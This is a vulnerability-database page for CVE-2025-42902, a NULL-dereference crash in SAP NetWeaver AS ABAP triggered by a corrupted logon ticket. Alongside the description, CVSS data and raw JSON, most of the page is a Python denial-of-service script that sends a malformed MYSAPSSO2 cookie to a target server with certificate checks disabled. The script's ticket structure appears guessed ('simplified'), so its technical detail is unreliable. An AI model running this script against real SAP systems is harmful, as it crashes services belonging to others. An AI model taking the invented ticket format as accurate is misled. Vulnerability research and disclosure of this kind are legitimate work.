Security Vulnerability Report
中文
CVE-2025-42902 CVSS 5.3 MEDIUM

CVE-2025-42902

Published: 2025-10-14 01:15:32
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Due to the memory corruption vulnerability in SAP NetWeaver AS ABAP and ABAP Platform, an unauthenticated attacker can send a corrupted SAP Logon Ticket or SAP Assertion Ticket to the SAP application server. This leads to a dereference of NULL which makes the work process crash. As a result, it has a low impact on the availability but no impact on the confidentiality and integrity.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

SAP NetWeaver AS ABAP
SAP NetWeaver AS ABAP Platform

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-42902 PoC - SAP NetWeaver AS ABAP Ticket Processing NULL Dereference # This PoC demonstrates how to trigger the vulnerability by sending a malformed SAP Logon Ticket # Note: This is for educational and authorized testing purposes only import socket import ssl import struct import sys # SAP Logon Ticket / Assertion Ticket processing endpoint # The ticket is typically sent via HTTP POST to the SAP application server TARGET_HOST = "sap-target.example.com" TARGET_PORT = 443 # HTTPS port for SAP NetWeaver def craft_malformed_sap_ticket(): """ Craft a malformed SAP Logon Ticket that triggers NULL pointer dereference. The ticket structure is intentionally corrupted to cause memory issues during parsing by the SAP application server's ticket validation logic. """ # SAP Logon Ticket base structure (simplified) # A valid ticket contains: version, ticket type, user info, validity, signature # By corrupting key fields, we trigger the NULL dereference vulnerability # Build a minimal ticket header with corrupted fields ticket = b"" # Ticket version (corrupted/invalid version) ticket += struct.pack(">H", 0xFFFF) # Invalid version number # Ticket type - SAP_LOGON_TICKET or SAP_ASSERTION_TICKET ticket += struct.pack(">H", 0x0003) # Assertion ticket type # Corrupted length fields to trigger buffer overread ticket += struct.pack(">I", 0xFFFFFFFF) # Extremely large length value # Malformed payload that will cause NULL pointer dereference # when the parser tries to validate and dereference internal pointers ticket += b"\x00" * 64 # Null bytes to trigger NULL dereference # Invalid signature placeholder ticket += b"\x00" * 32 return ticket def send_malformed_ticket(host, port, ticket_data): """ Send the malformed ticket to the SAP application server via HTTPS POST. The ticket is sent in the MYSAPSSO2 cookie or as part of the authentication header. """ # Construct HTTP POST request with malformed ticket in MYSAPSSO2 cookie http_request = f"""POST /sap/bc/soap/rfc HTTP/1.1\r Host: {host}\r Content-Type: text/xml; charset=utf-8\r Cookie: MYSAPSSO2={ticket_data.hex()}\r Content-Length: 0\r Connection: close\r \r """.encode() try: # Create SSL context for HTTPS connection context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE # Connect to SAP application server with socket.create_connection((host, port), timeout=10) as sock: with context.wrap_socket(sock, server_hostname=host) as ssock: # Send the malicious request ssock.send(http_request) # Receive response (server may crash during processing) try: response = ssock.recv(4096) print(f"[*] Response received: {response[:100]}") print("[*] Server processed the request (may have crashed work process)") except socket.timeout: print("[*] Connection timeout - possible work process crash") except ConnectionResetError: print("[*] Connection reset - work process likely crashed") except Exception as e: print(f"[!] Error: {e}") def main(): print(f"[*] CVE-2025-42902 PoC - SAP NetWeaver AS ABAP NULL Dereference") print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}") # Craft the malformed ticket ticket = craft_malformed_sap_ticket() print(f"[*] Malformed ticket crafted ({len(ticket)} bytes)") # Send to target send_malformed_ticket(TARGET_HOST, TARGET_PORT, ticket) print("[*] Attack completed - check target for work process crash") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-42902", "sourceIdentifier": "[email protected]", "published": "2025-10-14T01:15:31.960", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to the memory corruption vulnerability in SAP NetWeaver AS ABAP and ABAP Platform, an unauthenticated attacker can send a corrupted SAP Logon Ticket or SAP Assertion Ticket to the SAP application server. This leads to a dereference of NULL which makes the work process crash. As a result, it has a low impact on the availability but no impact on the confidentiality and integrity."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://me.sap.com/notes/3627308", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.